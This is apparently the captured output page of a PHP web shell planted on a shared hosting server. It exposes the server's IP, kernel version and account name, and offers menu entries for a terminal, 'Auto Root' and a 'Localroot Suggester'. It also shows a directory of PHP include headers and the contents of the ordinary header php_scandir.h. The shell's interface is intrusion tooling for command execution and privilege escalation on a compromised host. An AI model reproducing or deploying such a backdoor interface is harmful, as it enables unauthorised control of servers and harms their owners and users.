Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 3.145.2.74
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php83 /
usr /
include /
php /
main /
Delete
Unzip
Name
Size
Permission
Date
Action
streams
[ DIR ]
drwxr-xr-x
2025-03-31 10:38
SAPI.h
10.02
KB
-rw-r--r--
2025-03-13 15:54
build-defs.h
6.84
KB
-rw-r--r--
2025-03-13 15:54
fastcgi.h
4.78
KB
-rw-r--r--
2025-03-13 15:54
fopen_wrappers.h
2.2
KB
-rw-r--r--
2025-03-13 15:54
http_status_codes.h
2.83
KB
-rw-r--r--
2025-03-13 15:54
main_arginfo.h
6.2
KB
-rw-r--r--
2025-03-13 15:54
php.h
11.71
KB
-rw-r--r--
2025-03-13 15:54
php_compat.h
19.66
KB
-rw-r--r--
2025-03-13 15:54
php_config.h
50.01
KB
-rw-r--r--
2025-03-13 15:54
php_content_types.h
1.31
KB
-rw-r--r--
2025-03-13 15:54
php_getopt.h
1.63
KB
-rw-r--r--
2025-03-13 15:54
php_globals.h
3.89
KB
-rw-r--r--
2025-03-13 15:54
php_ini.h
3.53
KB
-rw-r--r--
2025-03-13 15:54
php_ini_builder.h
2.73
KB
-rw-r--r--
2025-03-13 15:54
php_main.h
2.88
KB
-rw-r--r--
2025-03-13 15:54
php_memory_streams.h
3.23
KB
-rw-r--r--
2025-03-13 15:54
php_network.h
10.46
KB
-rw-r--r--
2025-03-13 15:54
php_odbc_utils.h
1.27
KB
-rw-r--r--
2025-03-13 15:54
php_open_temporary_file.h
1.91
KB
-rw-r--r--
2025-03-13 15:54
php_output.h
8.78
KB
-rw-r--r--
2025-03-13 15:54
php_reentrancy.h
3.16
KB
-rw-r--r--
2025-03-13 15:54
php_scandir.h
1.67
KB
-rw-r--r--
2025-03-13 15:54
php_streams.h
29.99
KB
-rw-r--r--
2025-03-13 15:54
php_syslog.h
1.54
KB
-rw-r--r--
2025-03-13 15:54
php_ticks.h
1.34
KB
-rw-r--r--
2025-03-13 15:54
php_variables.h
2.07
KB
-rw-r--r--
2025-03-13 15:54
php_version.h
266
B
-rw-r--r--
2025-03-13 15:54
rfc1867.h
3.65
KB
-rw-r--r--
2025-03-13 15:54
snprintf.h
5.6
KB
-rw-r--r--
2025-03-13 15:54
spprintf.h
1.47
KB
-rw-r--r--
2025-03-13 15:54
Save
Rename
/* +----------------------------------------------------------------------+ | Copyright (c) The PHP Group | +----------------------------------------------------------------------+ | This source file is subject to version 3.01 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | https://www.php.net/license/3_01.txt | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | license@php.net so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Authors: Shane Caraveo <shane@caraveo.com> | | Ilia Alshanetsky <ilia@prohost.org> | +----------------------------------------------------------------------+ */ #ifndef PHP_SCANDIR_H #define PHP_SCANDIR_H #include <sys/types.h> #ifdef PHP_WIN32 #include "config.w32.h" #include "win32/readdir.h" #else #include <php_config.h> #endif #ifdef HAVE_DIRENT_H #include <dirent.h> #endif #ifdef HAVE_SCANDIR #define php_scandir scandir #else PHPAPI int php_scandir(const char *dirname, struct dirent **namelist[], int (*selector) (const struct dirent *entry), int (*compare) (const struct dirent **a, const struct dirent **b)); #endif #ifdef HAVE_ALPHASORT #define php_alphasort alphasort #else PHPAPI int php_alphasort(const struct dirent **a, const struct dirent **b); #endif #endif /* PHP_SCANDIR_H */